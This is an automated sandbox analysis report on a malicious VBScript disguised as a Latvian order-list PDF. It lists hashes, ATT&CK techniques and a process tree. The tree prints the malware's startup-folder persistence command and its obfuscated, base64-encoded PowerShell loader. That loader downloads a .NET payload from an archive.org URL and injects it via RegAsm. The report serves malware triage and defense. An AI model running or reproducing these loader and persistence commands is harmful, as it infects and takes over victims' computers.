1d5136cd83db5f71d6d8b10d43f33009aae773bac34a9ebe365a43ec4e954692

General

Target

PASUTIJUMU SARAKSTS 2112100 EUR DOKUMENTS SEPTEMBRIS PASUTIJUMA DOC pdf.vbs
Size

502KB
MD5

054770dd0e6f86d42f8df6f72265375b
SHA1

bd012509b749be9acc1dd0a67b8519dedaf1c680
SHA256

0a6ec56a9d84def4f2898df242f92e2aa9cf1bdf0d32bc0b710f4106bc3de651
SHA512

4b2777eb1ff628dfa9f378879828b4d4f4ae19386108de94584683c2173b70e7347da1d55a8be19bf146576e36f3e6ea70c50ab78aed69689ea8ebf2b71ca9c8
SSDEEP

12288:i6tQjLe5sR1aZdlZ7LVSFOzV3JMGeLF8azIdzzEV3J2m2Fjc1AkhbhBs3r:dY2SyPEED

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2792	powershell.exe
6	2792	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2472	powershell.exe
2256	powershell.exe
2792	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\descravizar.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\descravizar.vbs	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2452	cmd.exe
2180	PING.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2180	PING.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2472	powershell.exe
2256	powershell.exe
2792	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1232 wrote to memory of 2452	1232	WScript.exe	30
PID 1232 wrote to memory of 2452	1232	WScript.exe	30
PID 1232 wrote to memory of 2452	1232	WScript.exe	30
PID 2452 wrote to memory of 2180	2452	cmd.exe	32
PID 2452 wrote to memory of 2180	2452	cmd.exe	32
PID 2452 wrote to memory of 2180	2452	cmd.exe	32
PID 2452 wrote to memory of 2472	2452	cmd.exe	34
PID 2452 wrote to memory of 2472	2452	cmd.exe	34
PID 2452 wrote to memory of 2472	2452	cmd.exe	34
PID 1232 wrote to memory of 2256	1232	WScript.exe	35
PID 1232 wrote to memory of 2256	1232	WScript.exe	35
PID 1232 wrote to memory of 2256	1232	WScript.exe	35
PID 2256 wrote to memory of 2792	2256	powershell.exe	37
PID 2256 wrote to memory of 2792	2256	powershell.exe	37
PID 2256 wrote to memory of 2792	2256	powershell.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PASUTIJUMU SARAKSTS 2112100 EUR DOKUMENTS SEPTEMBRIS PASUTIJUMA DOC pdf.vbs"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1232
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\PASUTIJUMU SARAKSTS 2112100 EUR DOKUMENTS SEPTEMBRIS PASUTIJUMA DOC pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.razivarcsed.vbs')')
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:2452
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 10
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2180
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\PASUTIJUMU SARAKSTS 2112100 EUR DOKUMENTS SEPTEMBRIS PASUTIJUMA DOC pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.razivarcsed.vbs')')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2472
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNnZndScrJ3JsJysnID0gJysnWlJ4aHR0cHM6Ly9pYTYwMDEnKycwMCcrJy51Jysncy5hcmNoaXZlLm9yJysnZy8nKycyNC9pdGVtJysncy9kZXRhaC1ub3RlLXYvJysnRGV0JysnYWgnKydObycrJ3RlVi50eHRaUng7NnZnYmEnKydzZTY0Q29udGVudCA9IChOJysnZXctTycrJ2JqJysnZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZScrJ250KS5Eb3dubG9hZFN0cmluZygnKyc2dmd1cmwpOzZ2ZycrJ2JpbmFyJysneUMnKydvbnRlbicrJ3QgPSBbU3lzJysndGUnKydtLkNvbnZlcnRdOjpGcm9tQmFzZTY0UycrJ3RyaW4nKydnKCcrJzZ2Z2JhJysnc2U2NENvJysnbicrJ3RlJysnbnQpOycrJzZ2Z2Fzc2VtYmx5JysnID0gW1JlZmxlY3RpbycrJ24nKycuQXNzZW1iJysnbCcrJ3ldJysnOicrJzpMb2FkKDZ2JysnZ2JpbmFyJysneUMnKydvbnRlJysnbicrJ3QpJysnOzYnKyd2Z3QnKyd5cCcrJ2UgPSA2dmdhc3NlbWJseS5HZXRUJysneXBlKFpSeFJ1blBFJysnLkhvbWVaJysnUngpOzZ2Z21ldGhvZCA9IDYnKyd2Z3QnKyd5JysncGUnKycuR2V0JysnTWV0aG9kKFpSeFZBSVpSeCknKyc7NnZnbWV0aG9kLkludm9rZSg2dmdudWxsLCBbb2InKydqJysnZWN0WycrJ10nKyddJysnQCcrJyhaUngwLycrJ3Z1bycrJ29oL2QvZScrJ2UuZXQnKydzYXAnKycvLycrJzpzcHR0aFpSJysneCAsIFonKydSeCcrJ2Rlc2F0aScrJ3ZhJysnZG8nKydaJysnUngnKycgLCBaUnhkZXNhdGl2YWRvWlJ4ICcrJywgWicrJ1J4ZGVzYScrJ3RpdmFkb1pSeCcrJywnKydaUnhSZScrJ2dBc21aUngsWlJ4WicrJ1J4KSknKSAtcmVwTEFDZShbQ0hhUl05MCtbQ0hhUl04MitbQ0hhUl0xMjApLFtDSGFSXTM5LXJlcExBQ2UgKFtDSGFSXTU0K1tDSGFSXTExOCtbQ0hhUl0xMDMpLFtDSGFSXTM2KXwmKCAkZW52OkNPTXNQRWNbNCwxNSwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2256
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('6vgu'+'rl'+' = '+'ZRxhttps://ia6001'+'00'+'.u'+'s.archive.or'+'g/'+'24/item'+'s/detah-note-v/'+'Det'+'ah'+'No'+'teV.txtZRx;6vgba'+'se64Content = (N'+'ew-O'+'bj'+'ect System.Net.WebClie'+'nt).DownloadString('+'6vgurl);6vg'+'binar'+'yC'+'onten'+'t = [Sys'+'te'+'m.Convert]::FromBase64S'+'trin'+'g('+'6vgba'+'se64Co'+'n'+'te'+'nt);'+'6vgassembly'+' = [Reflectio'+'n'+'.Assemb'+'l'+'y]'+':'+':Load(6v'+'gbinar'+'yC'+'onte'+'n'+'t)'+';6'+'vgt'+'yp'+'e = 6vgassembly.GetT'+'ype(ZRxRunPE'+'.HomeZ'+'Rx);6vgmethod = 6'+'vgt'+'y'+'pe'+'.Get'+'Method(ZRxVAIZRx)'+';6vgmethod.Invoke(6vgnull, [ob'+'j'+'ect['+']'+']'+'@'+'(ZRx0/'+'vuo'+'oh/d/e'+'e.et'+'sap'+'//'+':sptthZR'+'x , Z'+'Rx'+'desati'+'va'+'do'+'Z'+'Rx'+' , ZRxdesativadoZRx '+', Z'+'Rxdesa'+'tivadoZRx'+','+'ZRxRe'+'gAsmZRx,ZRxZ'+'Rx))') -repLACe([CHaR]90+[CHaR]82+[CHaR]120),[CHaR]39-repLACe ([CHaR]54+[CHaR]118+[CHaR]103),[CHaR]36)|&( $env:COMsPEc[4,15,25]-jOiN'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LY1XQ4KUYVRT43QET8QO.temp

Filesize
7KB

MD5
47f9f6339d3082631ea9d761b5bbc0bc

SHA1
5605d257ca8f55671a7f147d01d690c7da776549

SHA256
c04705e0424c716c9230806c98f9667d001a99fdac3cf0d90e850d6926371beb

SHA512
c7bb0dcb24a52360d1c2f004e34941074806b668722cda08c97b9edcb6a11233a8812f8a634a1a18321951406d628b47eeefeaf222ecaaecf4bddbde9b74b133

Download Submit
memory/2256-17-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/2256-18-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2472-5-0x000007FEF54EE000-0x000007FEF54EF000-memory.dmp

Filesize
4KB

Download
memory/2472-6-0x000000001B580000-0x000000001B862000-memory.dmp

Filesize
2.9MB

Download
memory/2472-7-0x000007FEF5230000-0x000007FEF5BCD000-memory.dmp

Filesize
9.6MB

Download
memory/2472-8-0x000007FEF5230000-0x000007FEF5BCD000-memory.dmp

Filesize
9.6MB

Download
memory/2472-9-0x0000000001D20000-0x0000000001D28000-memory.dmp

Filesize
32KB

Download
memory/2472-10-0x000007FEF5230000-0x000007FEF5BCD000-memory.dmp

Filesize
9.6MB

Download
memory/2472-11-0x000007FEF5230000-0x000007FEF5BCD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing